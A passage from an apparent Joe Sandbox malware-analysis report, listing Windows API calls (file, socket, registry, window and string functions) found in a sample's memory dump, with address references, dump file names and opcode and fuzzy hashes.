                                                      • WriteFile.KERNEL32(?,00E73CD6,00000000,00E65BA3,00000000,?,?,?,?,?,?,?,?,?,00E65BA3,?), ref: 00E6554B
                                                      • WriteFile.KERNEL32(?,?,00000001,00E65BA3,00000000,?,?,?,?,?,?,?,?,?,00E65BA3,?), ref: 00E65584
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 3f438ebb3a24238bc99f9625a9d5651b258222108ab508e9b1626eaeac8d28c6
                                                      • Instruction ID: c63017d89a7e1a8ea30a5719b0ef2a0583510cc2ac8a1079b905bf720fab1f00
                                                      • Opcode Fuzzy Hash: 3f438ebb3a24238bc99f9625a9d5651b258222108ab508e9b1626eaeac8d28c6
                                                      • Instruction Fuzzy Hash: D151B0B1A006499FDB10CFA8E845AEEBBF9EF48340F14515AF956F7291D6309A41CF60
                                                      APIs
                                                        • Part of subcall function 00EB304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EB307A
                                                        • Part of subcall function 00EB304E: _wcslen.LIBCMT ref: 00EB309B
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EB1112
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1121
                                                      • WSAGetLastError.WSOCK32 ref: 00EB11C9
                                                      • closesocket.WSOCK32(00000000), ref: 00EB11F9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 2675159561-0
                                                      • Opcode ID: bdb26e60dab64998d22583583d0903c30546bc64af0138bd458182851a92edb8
                                                      • Instruction ID: a97be5ec2596e3335071a14f771a360b8d853bce6fa4c530c70adb140518a608
                                                      • Opcode Fuzzy Hash: bdb26e60dab64998d22583583d0903c30546bc64af0138bd458182851a92edb8
                                                      • Instruction Fuzzy Hash: A141F731600114AFDB109F28C895BEBBBE9EF45368F149099F909BB291C771ED45CBA0
                                                      APIs
                                                        • Part of subcall function 00E9DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E9CF22,?), ref: 00E9DDFD
                                                        • Part of subcall function 00E9DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E9CF22,?), ref: 00E9DE16
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E9CF45
                                                      • MoveFileW.KERNEL32(?,?), ref: 00E9CF7F
                                                      • _wcslen.LIBCMT ref: 00E9D005
                                                      • _wcslen.LIBCMT ref: 00E9D01B
                                                      • SHFileOperationW.SHELL32(?), ref: 00E9D061
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 3164238972-1173974218
                                                      • Opcode ID: fe4c977757a958bc4a719dd0db298beca9e6b7e29c53c2d0582f83a219cba75c
                                                      • Instruction ID: 6c2ef5bd6ac9d2b5941ac15940553144269d1c430a94e09924d7fe861ef72f0a
                                                      • Opcode Fuzzy Hash: fe4c977757a958bc4a719dd0db298beca9e6b7e29c53c2d0582f83a219cba75c
                                                      • Instruction Fuzzy Hash: 614153719052189FDF16EBA4DD81ADEB7F9AF48380F1010E6E509FB142EB34A689CB50
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EC2E1C
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EC2E4F
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EC2E84
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EC2EB6
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EC2EE0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EC2EF1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EC2F0B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: 7061c8a883aeb2b37c4e4fde1b4df02a23052405ab2febe57502d7c1b58ea7e0
                                                      • Instruction ID: 09b0ddd4dec5109f3bdca4e3974d91c7759f13404089977223a733e271ece5e6
                                                      • Opcode Fuzzy Hash: 7061c8a883aeb2b37c4e4fde1b4df02a23052405ab2febe57502d7c1b58ea7e0
                                                      • Instruction Fuzzy Hash: 313106306041589FEB22DF59DE84FA937E1FB4AB14F151168FA04AF2B1CB72A846DB41
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E97769
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9778F
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00E97792
                                                      • SysAllocString.OLEAUT32(?), ref: 00E977B0
                                                      • SysFreeString.OLEAUT32(?), ref: 00E977B9
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E977DE
                                                      • SysAllocString.OLEAUT32(?), ref: 00E977EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: c9b1c368e4163336b5e7099ffe00e61c1d3b9fae83242cee859f15485aeff86b
                                                      • Instruction ID: 91e4426c0deb8f854711b4a9b475628bd11774839a88e9c9ad2d186de683d5c0
                                                      • Opcode Fuzzy Hash: c9b1c368e4163336b5e7099ffe00e61c1d3b9fae83242cee859f15485aeff86b
                                                      • Instruction Fuzzy Hash: 0921B276604219AFDF10DFA9DC88CBB73ACFB097657148026F954EB250D670DC8AC760
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E97842
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E97868
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00E9786B
                                                      • SysAllocString.OLEAUT32 ref: 00E9788C
                                                      • SysFreeString.OLEAUT32 ref: 00E97895
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E978AF
                                                      • SysAllocString.OLEAUT32(?), ref: 00E978BD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: d438da81034a4409463953e1e720dd90e71880027e011e2375f72687ab6617af
                                                      • Instruction ID: dd4e3beb8a1827a6b2023bee508af9ae43ed301a57071a02215331ba1ede2101
                                                      • Opcode Fuzzy Hash: d438da81034a4409463953e1e720dd90e71880027e011e2375f72687ab6617af
                                                      • Instruction Fuzzy Hash: DB21C131608214AFDF249FA9DC88DAA77FCFB087607148025F954EB2A0D670DC4ACB64
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00EA04F2
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA052E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 60da6f98c276b99e06e6a5b16d6ed89bad8c389c40eea6dd5d8f89102ce33cee
                                                      • Instruction ID: 5ef26b28c7d9e76297eb3eb7caa3022be17a5c2315eec82f472db201c89fc3ea
                                                      • Opcode Fuzzy Hash: 60da6f98c276b99e06e6a5b16d6ed89bad8c389c40eea6dd5d8f89102ce33cee
                                                      • Instruction Fuzzy Hash: 672171719003059FDB309F69DC44A9A7BB4AF4A768F204A29E8A1FA1E0D770A955CF20
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00EA05C6
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA0601
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 2c4246df99ed70e95c3efce9d749b9e896b992146422f963a149cb9b0bf4cfeb
                                                      • Instruction ID: 48ab17f15e78600d6ff0e8d2474a73108cdebfb965f78164ec6cdd1e3c559036
                                                      • Opcode Fuzzy Hash: 2c4246df99ed70e95c3efce9d749b9e896b992146422f963a149cb9b0bf4cfeb
                                                      • Instruction Fuzzy Hash: 832181755003059FDB209F699C04E9A77E4BFDA728F201A19F9A1FB2E0E771A865CB10
                                                      APIs
                                                        • Part of subcall function 00E3600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E3604C
                                                        • Part of subcall function 00E3600E: GetStockObject.GDI32(00000011), ref: 00E36060
                                                        • Part of subcall function 00E3600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E3606A
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EC4112
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EC411F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EC412A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EC4139
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EC4145
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: d2203443568f5fd6030501eff8e2bb248556edbeb357562ddb36bc5940ed61f2
                                                      • Instruction ID: 098f204e634c71fbe527ba01c3560f81c78dfe327f4de00a3df64c68a0e95c76
                                                      • Opcode Fuzzy Hash: d2203443568f5fd6030501eff8e2bb248556edbeb357562ddb36bc5940ed61f2
                                                      • Instruction Fuzzy Hash: 1F1190B214021DBEEF218F64CC86EE77F9DEF08798F005111FA58A2090C6729C22DBA4
                                                      APIs
                                                        • Part of subcall function 00E6D7A3: _free.LIBCMT ref: 00E6D7CC
                                                      • _free.LIBCMT ref: 00E6D82D
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E6D838
                                                      • _free.LIBCMT ref: 00E6D843
                                                      • _free.LIBCMT ref: 00E6D897
                                                      • _free.LIBCMT ref: 00E6D8A2
                                                      • _free.LIBCMT ref: 00E6D8AD
                                                      • _free.LIBCMT ref: 00E6D8B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E9DA74
                                                      • LoadStringW.USER32(00000000), ref: 00E9DA7B
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E9DA91
                                                      • LoadStringW.USER32(00000000), ref: 00E9DA98
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E9DADC
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00E9DAB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 4072794657-3128320259
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(011B3168,011B3168), ref: 00EA097B
                                                      • EnterCriticalSection.KERNEL32(011B3148,00000000), ref: 00EA098D
                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00EA099B
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00EA09A9
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EA09B8
                                                      • InterlockedExchange.KERNEL32(011B3168,000001F6), ref: 00EA09C8
                                                      • LeaveCriticalSection.KERNEL32(011B3148), ref: 00EA09CF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EB1DC0
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EB1DE1
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1DF2
                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00EB1EDB
                                                      • inet_ntoa.WSOCK32(?), ref: 00EB1E8C
                                                        • Part of subcall function 00E939E8: _strlen.LIBCMT ref: 00E939F2
                                                        • Part of subcall function 00EB3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00EAEC0C), ref: 00EB3240
                                                      • _strlen.LIBCMT ref: 00EB1F35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3203458085-0
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 00E35D30
                                                      • GetWindowRect.USER32(?,?), ref: 00E35D71
                                                      • ScreenToClient.USER32(?,?), ref: 00E35D99
                                                      • GetClientRect.USER32(?,?), ref: 00E35ED7
                                                      • GetWindowRect.USER32(?,?), ref: 00E35EF8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Rect$Client$Window$Screen
                                                      • String ID:
                                                      • API String ID: 1296646539-0
                                                      APIs
                                                      • __allrem.LIBCMT ref: 00E600BA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E600D6
                                                      • __allrem.LIBCMT ref: 00E600ED
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E6010B
                                                      • __allrem.LIBCMT ref: 00E60122
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E60140
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E582D9,00E582D9,?,?,?,00E6644F,00000001,00000001,?), ref: 00E66258
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E6644F,00000001,00000001,?,?,?,?), ref: 00E662DE
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E663D8
                                                      • __freea.LIBCMT ref: 00E663E5
                                                        • Part of subcall function 00E63820: RtlAllocateHeap.NTDLL(00000000,?,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6,?,00E31129), ref: 00E63852
                                                      • __freea.LIBCMT ref: 00E663EE
                                                      • __freea.LIBCMT ref: 00E66413
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00EBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBB6AE,?,?), ref: 00EBC9B5
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBC9F1
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA68
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBBCCA
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBBD25
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EBBD6A
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EBBD99
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EBBDF3
                                                      • RegCloseKey.ADVAPI32(?), ref: 00EBBDFF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                      • String ID:
                                                      • API String ID: 1120388591-0
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000035), ref: 00E8F7B9
                                                      • SysAllocString.OLEAUT32(00000001), ref: 00E8F860
                                                      • VariantCopy.OLEAUT32(00E8FA64,00000000), ref: 00E8F889
                                                      • VariantClear.OLEAUT32(00E8FA64), ref: 00E8F8AD
                                                      • VariantCopy.OLEAUT32(00E8FA64,00000000), ref: 00E8F8B1
                                                      • VariantClear.OLEAUT32(?), ref: 00E8F8BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                      • String ID:
                                                      • API String ID: 3859894641-0
                                                      APIs
                                                        • Part of subcall function 00E37620: _wcslen.LIBCMT ref: 00E37625
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00EA94E5
                                                      • _wcslen.LIBCMT ref: 00EA9506
                                                      • _wcslen.LIBCMT ref: 00EA952D
                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00EA9585
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$FileName$OpenSave
                                                      • String ID: X
                                                      • API String ID: 83654149-3081909835
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • BeginPaint.USER32(?,?,?), ref: 00E49241
                                                      • GetWindowRect.USER32(?,?), ref: 00E492A5
                                                      • ScreenToClient.USER32(?,?), ref: 00E492C2
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E492D3
                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00E49321
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00E871EA
                                                        • Part of subcall function 00E49339: BeginPath.GDI32(00000000), ref: 00E49357
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                      • String ID:
                                                      • API String ID: 3050599898-0
                                                      • Opcode ID: a23d44bb093ba1b860625393a076f52ce4703c7c6f93c8e277ee89f900ebbc66
                                                      • Instruction ID: 436ac6efd50349c79fd3882d7c173e4ef751a6a24ad157ede92b9f99e94f8419
                                                      • Opcode Fuzzy Hash: a23d44bb093ba1b860625393a076f52ce4703c7c6f93c8e277ee89f900ebbc66
                                                      • Instruction Fuzzy Hash: A6419130105200AFD721DF25EC88FAB7BF8FB46724F140269F998A72E2C7719845DB61
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EA080C
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00EA0847
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00EA0863
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00EA08DC
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00EA08F3
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA0921
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
